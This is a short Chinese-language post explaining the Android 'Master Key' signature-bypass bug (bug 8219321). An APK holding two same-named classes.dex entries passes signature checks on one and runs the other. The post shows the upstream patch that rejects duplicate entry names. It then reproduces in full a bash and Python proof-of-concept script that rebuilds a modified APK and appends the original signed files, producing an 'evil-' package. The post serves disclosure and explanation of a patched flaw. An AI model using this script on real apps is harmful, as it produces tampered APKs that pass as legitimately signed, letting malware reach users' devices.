炒的沸沸扬扬的android 大漏洞poc

https://gist.github.com/poliva/36b0795ab79ad6f14fd8

问题：

The appearance of two files with identical names in a JAR/ZIP/APK archive will provide application scanners with a simple signature for detecting modified archives and, presumably,

说白了，就是一个zip里面部署了2个同名的dex。一个签名一致的，一个篡改了的也就是签名不一致的。

安装时校验签名的时候是用的framework的ZipFile实现，用的是没修改的class.dex，认证通过。而安装完毕dexopt的时候，使用修改过class.dex。 这其实没问题。

关键的问题就是同名entry的问题，就是一个zip里面同名dex的问题。

 下面的代码修复就是检测同名的：

原代码：
for (int i = 0; i < numEntries; ++i) {
ZipEntry newEntry = new ZipEntry(hdrBuf, bin);
mEntries.put(newEntry.getName(), newEntry);
}

修补后：
for (int i = 0; i < numEntries; ++i) {
ZipEntry newEntry = new ZipEntry(hdrBuf, bin);
String entryName = newEntry.getName();
if (mEntries.put(entryName, newEntry) != null) {
throw new ZipException("Duplicate entry name: " + entryName);
}
}

 

POC：

 

#!/bin/bash

# PoC for Android bug 8219321 by @pof

# +info: https://jira.cyanogenmod.org/browse/CYAN-1602

if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit1 ; fi

APK = $1

rm -r out out.apk tmp 2>/dev/null

java -jar apktool.jar d $APK out

#apktool d $APK out

echo "Modify files, when done type 'exit'"

cd out

bash

cd ..

java -jar apktool.jar b out out.apk

#apktool b out out.apk

mkdir tmp

cd tmp/

unzip ../ $APK

mv ../out.apk .

cat >poc.py <<-EOF

#!/usr/bin/python

import zipfile

import sys

z = zipfile.ZipFile(sys.argv[1], "a")

z.write(sys.argv[2])

z.close()

EOF

chmod 755 poc.py

for f in `find . -type f |egrep -v "(poc.py|out.apk)" ` ; do ./poc.py out.apk "$f" ; done

cp out.apk ../evil- $APK

cd ..

rm -rf tmp out

echo "Modified APK: evil-$APK"